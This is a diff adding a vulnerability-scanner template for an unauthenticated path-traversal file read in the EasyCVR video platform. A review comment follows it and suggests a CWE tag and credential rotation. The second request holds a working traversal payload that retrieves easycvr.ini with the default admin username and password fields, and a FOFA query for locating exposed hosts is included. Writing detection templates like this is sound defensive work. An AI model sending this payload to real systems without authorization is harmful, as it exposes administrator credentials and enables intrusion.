diff --git a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
new file mode 100644
index 00000000000..934b55491d5
--- /dev/null
+++ b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
@@ -0,0 +1,46 @@
+id: easycvr-arbitrary-file-read
+
+info:
+ name: EasyCVR Video Management - Arbitrary File Read
+ author: s4e-io
+ severity: high
+ description: |
+ The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.
+ remediation: |
+ Ensure that the application does not allow directory traversal or access to sensitive files through web requests. Implement proper input validation and restrict access to critical files.
+ reference:
+ - https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486259&idx=1&sn=dd51ca8df3aa1533144b975b9bec3086
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: icon_hash="458134656"
+ tags: easycvr,unauth,lfi
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "EasyCVR")'
+ - "status_code == 200"
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body, "default_admin_user", "default_admin_password")'
+ - 'contains(content_type, "text/plain")'
+ - "status_code == 200"
+ condition: and
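Review bot: The `info` block carries no `classification`, and its `remediation` stops at generic input validation even though the second request's matcher only fires when `easycvr.ini` is returned with `default_admin_user` and `default_admin_password` in the body. A hit from this template therefore means the administrator credentials in that file should be treated as exposed, which the remediation text should say. I would add a `classification:` entry with `cwe-id: CWE-22` and extend the remediation with a sentence such as `Rotate the administrator credentials stored in easycvr.ini and restrict network access to the management interface until the taillog endpoint is fixed or blocked.` The description also lists "database configuration files" twice in the same sentence and could be trimmed to one mention.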